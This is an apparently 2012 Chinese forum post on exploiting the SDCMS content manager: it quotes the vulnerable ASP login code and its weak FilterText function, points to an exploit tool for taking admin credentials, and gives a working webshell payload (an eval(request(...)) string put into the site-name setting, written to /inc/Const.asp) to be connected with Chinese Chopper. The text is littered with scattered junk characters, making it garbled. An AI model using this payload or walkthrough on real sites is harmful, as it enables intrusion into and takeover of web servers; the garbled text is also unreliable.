作者:T00LS 鬼哥
, x( ~3 ^, p+ ~( o/ Q! h漏洞文件:后台目录/index.asp/ Q) G9 ^/ M+ T4 y
; V0 w0 K- p( k- W2 L! p. k" W, ?Sub Check g/ \, h5 C- d
Dim username,password,code,getcode,Rs
& f: d! O" t/ U$ E; G9 e- E; ]6 v% j IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub0 f& K7 u6 I6 W1 B4 Q; D/ Z# @
username=FilterText(Trim(Request.Form("username")),1)- o$ l' p0 e# ]9 [3 O' @3 h
password=FilterText(Trim(Request.Form("password")),1)
0 `4 i) B( I5 _0 x# }" [0 {# h code=Trim(Request.Form("yzm"))$ b e7 Q9 ~# c( `3 m7 \
getcode=Session("SDCMSCode")9 V# L z# e" o4 ~
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
0 p3 N0 g! }* O0 _- V: R: E1 H IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied! U4 U# J7 l. {! h3 ?* A
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
9 l" _+ {1 y$ p) g, E( \3 T+ w IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
* b/ m$ [, Q: N& R% f0 L; _ IF username="" or password="" Then
* |* c0 K o5 l/ l3 s% v2 M Echo "用户名或密码不能为空"ied
& J4 a0 v3 u- g Else
; s2 F: n3 n$ f ~: P, q Q( g5 A Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")- w0 H; P1 v, j {2 n. e( ?" W, d
IF Rs.Eof Then
$ L0 T. U+ p2 q* B AddLog username,GetIp,"登录失败",1. g M7 K% L, q: o3 y3 Z* E- _
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
3 @' P. j6 p8 m3 ]( a2 O5 n3 t! t Else3 ~2 p) \! I' F+ z* J# M) ?9 e
Add_Cookies "sdcms_id",Rs(0)
# k8 c7 b, D- A0 J: {. B. x Add_Cookies "sdcms_name",username
7 p! H$ ]! {4 U% h/ P+ _1 T7 q Add_Cookies "sdcms_pwd",Rs(2)9 w1 ^& [" M+ o; K' `1 E2 R
Add_Cookies "sdcms_admin",Rs(3)* p, k r* q& `8 r' w7 c
Add_Cookies "sdcms_alllever",Rs(4)7 t# Q+ v t7 q. w' v8 W. }
Add_Cookies "sdcms_infolever",Rs(5)
, o2 @" R6 F" V Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")7 \1 Q) ?) [& `9 o$ Q
AddLog username,GetIp,"登录成功",1* |+ B% S& q" c; I( f/ V( J
'自动删除30天前的Log记录
2 h: c& J% n7 u3 } IF Sdcms_DataType Then
; X3 v# z* w5 N! J" U Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
# U4 A$ w j1 l9 v" V& g. L. w Else
) d. j# o6 J# x/ K' C- V" G( Y Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")5 G2 Y3 j% q: g' w w
End IF
5 l" p9 W* _6 z Go("sdcms_index.asp")) `$ a; N ?0 e
End IF
2 B* z6 S' r+ l2 \) q. s Rs.Close
& p; u$ K Z0 P- L Set Rs=Nothing
! }* \" b& s$ ]; _+ ] End IF
+ @# e2 t( n1 ?. zEnd Sub8 h7 q) M" k; f+ c
4 ?( ~. X) }5 A3 J
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码: d+ \6 `( s: G- m) ]9 _% c# J
7 s% C! q1 o: J5 r( R& V g
Function FilterText(ByVal t0,ByVal t1)5 F% ~* d1 d0 g4 _% G& {5 _
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function& N( t/ g, \* l# ?: L% u
t0=Trim(t0)* |, s6 ^, I6 ~1 W& ^" a- G
Select Case t1* v; F) Y' n/ N" M. w( B
Case "1"; S8 o* }; _! Y- V- k; u
t0=Replace(t0,Chr(32),"")1 ~4 Y* x4 O# W2 k
t0=Replace(t0,Chr(13),"")7 \5 y) F0 G8 x& N- S; U7 M# ]
t0=Replace(t0,Chr(10)&Chr(10),"")( F8 i; W) j! G9 i( j
t0=Replace(t0,Chr(10),"")
r* _3 S* Q& y8 ^ Case "2"2 w6 p- w* x; M$ M
t0=Replace(t0,Chr(8),"")'回格
. y& F# x3 x% r" M' E t0=Replace(t0,Chr(9),"")'tab(水平制表符)/ L Q( p% E( u' H; C, U
t0=Replace(t0,Chr(10),"")'换行
0 ~1 @. V4 z: q( \/ j7 D6 J9 ?4 U( M t0=Replace(t0,Chr(11),"")'tab(垂直制表符)4 ?( d& ?0 E' T* T( }
t0=Replace(t0,Chr(12),"")'换页. g4 H3 Q1 I; Y7 x
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
* w) z x4 t. a3 X t0=Replace(t0,Chr(22),"")
) T; w4 N' a2 W" l8 [! D+ x t0=Replace(t0,Chr(32),"")'空格 SPACE+ P) F7 I/ U* i! k: c% a
t0=Replace(t0,Chr(33),"")'!
+ Q% d: O+ x9 q4 f t0=Replace(t0,Chr(34),"")'") `: B* m/ B/ Z
t0=Replace(t0,Chr(35),"")'# D& |% f* e9 O6 A3 c" w2 l; n
t0=Replace(t0,Chr(36),"")'$
3 H9 U# _7 v- o& X. B# t8 @ t0=Replace(t0,Chr(37),"")'%
* [6 h& Z; {9 j! Z, W L t0=Replace(t0,Chr(38),"")'&! C: n, I6 l; J# _
t0=Replace(t0,Chr(39),"")''
) y* {" t- E4 f t0=Replace(t0,Chr(40),"")'(
7 J( L& X" Q! i0 y- K t0=Replace(t0,Chr(41),"")')* F8 B8 M, x' w, t. ~/ Y- S5 i
t0=Replace(t0,Chr(42),"")'*7 M; A, @0 R7 j# K, {" k9 s
t0=Replace(t0,Chr(43),"")'+% q+ S3 s; K+ \7 U/ _
t0=Replace(t0,Chr(44),"")',
/ r1 J- M8 `8 K# Y t0=Replace(t0,Chr(45),"")'-
0 t+ }% l. F9 t @1 f5 a8 _ t0=Replace(t0,Chr(46),"")'.% e" n; F! [7 a" B$ a2 G
t0=Replace(t0,Chr(47),"")'/
- h7 p, _$ v! B6 K. k) |' s5 {% t t0=Replace(t0,Chr(58),"")':& z) C' S4 V5 ~0 x7 H
t0=Replace(t0,Chr(59),"")';
( x. N$ V- ^& [1 }' A5 w2 u t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
: F! k! P% M# H q) F3 w$ c' { t0=Replace(t0,Chr(63),"")'?
( y4 ~! P, A( l t0=Replace(t0,Chr(64),"")'@8 [" D) F. c. v0 W9 H
t0=Replace(t0,Chr(91),"")'\' ?- v1 a2 {" l M
t0=Replace(t0,Chr(92),"")'\
: G, P! ?8 \9 g# a- e; d t0=Replace(t0,Chr(93),"")']6 G" ^' C( N1 N
t0=Replace(t0,Chr(94),"")'^
3 N7 S! p( W+ ` r6 G8 V t0=Replace(t0,Chr(95),"")'_
' X2 ], R4 W& ~( c7 Y t0=Replace(t0,Chr(96),"")'`7 i n" c/ J# G- I
t0=Replace(t0,Chr(123),"")'{
]; V+ O5 J$ m+ V. e8 I t0=Replace(t0,Chr(124),"")'|6 i* {& n$ @5 U4 ^: Y& q$ R
t0=Replace(t0,Chr(125),"")'}! b2 J: `* N! \6 j9 E
t0=Replace(t0,Chr(126),"")'~
. h. B* D, ~ ^1 x* F* f# ]. m Case Else& e: F$ ^$ l, b" s* f0 w y
t0=Replace(t0, "&", "&")0 V: P! F1 I6 w8 z1 @+ l! P
t0=Replace(t0, "'", "'"). I! c+ v6 M; ]* k# n
t0=Replace(t0, """", """)
' ~. h5 z4 ]6 @ t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")' q- p6 W- Z4 O) q6 E8 z1 ^
End Select; e( [( b( n7 S
IF Instr(Lcase(t0),"expression")>0 Then$ w" R; B8 n& m6 v
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
' v. t- A- q& [+ y End If W7 }% m, N( Y, s2 P9 S* N9 J e
FilterText=t0# J; [" _$ Z& D' V# X" O
End Function! g6 k+ T0 b. S8 Z8 h8 ~& J
6 U; p7 a* @# X ~
看到没。直接参数是1 只过滤
; [1 Z- d2 ^, M4 [# g# Z1 p7 I) z t0=Replace(t0,Chr(32)," ")
; B1 ?7 ?$ J" `$ J, [9 Z' N t0=Replace(t0,Chr(13),"")6 ^ o: M! a# ^, h7 G
t0=Replace(t0,Chr(10)&Chr(10),"+ G* G, n4 m0 g$ s
")
1 V9 `$ M ~" |" F0 i5 ]- ^. E& \ t0=Replace(t0,Chr(10)," ^3 N% M% a( }7 t6 c4 S# Y4 n9 W
")+ B# B1 D9 u- r+ J, i p0 p
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
. g1 S. a. B @8 C+ U- R+ {EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP8 H" ^+ x$ ^+ |. I8 G/ v8 m% E
' B! t5 x& n) f0 m! L" U测试:1 E+ j5 H8 d6 H- c+ }8 @
& W2 E" v5 {9 z. a" }/ `) R0 |4 c$ |; a# N. L9 ~
现在输入工具上验证码,然后点OK; x9 L, U2 K, B5 | X& J" ]) {
8 f0 ?& V; T& G7 d; T
5 ^. L6 G: L3 U0 c! _
看到我们直接进入后台管理界面了,呵呵!
$ V% G0 i# R1 T+ V+ P
2 p. C0 p: U. f6 G+ G1 V) k6 m
2 i- K" T9 Z7 t" _% V1 R2 e! V( W& d! \
这样直接进入后台了。。。。# W7 g+ i. I2 _+ ?* ]8 z2 d8 i
) R" M! B) A; J1 ] 8 b/ R$ h* @! v) x8 J
1 q& |7 _+ v8 {: I/ V0 p. t" DSDCMS提权:
) \, g8 b0 k0 {# l0 x! L. a$ a& M3 J G8 i( r7 |" d) P
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
: E# f* }/ \1 U% A: f- Y. o
9 z6 t9 h+ a- ~6 o- F
- {$ f: C& M& S7 X* R. e& ^- e- A$ T; L% k1 c
OK,现在用菜刀连接下!
' l& d- Q7 T! {. Q" L9 j; a" ?7 n
3 g/ }! h6 z; ^5 h' Q+ |1 R' X4 V& ^) N) P8 N
9 f$ Y% Q+ k% D2 s0 X2 }
& K7 M* [8 x, [: [2 X+ X9 n5 t) Z6 e. A; x# X' f. P' F
|
发表于 2012-11-9 20:57:02
收藏
支持
反对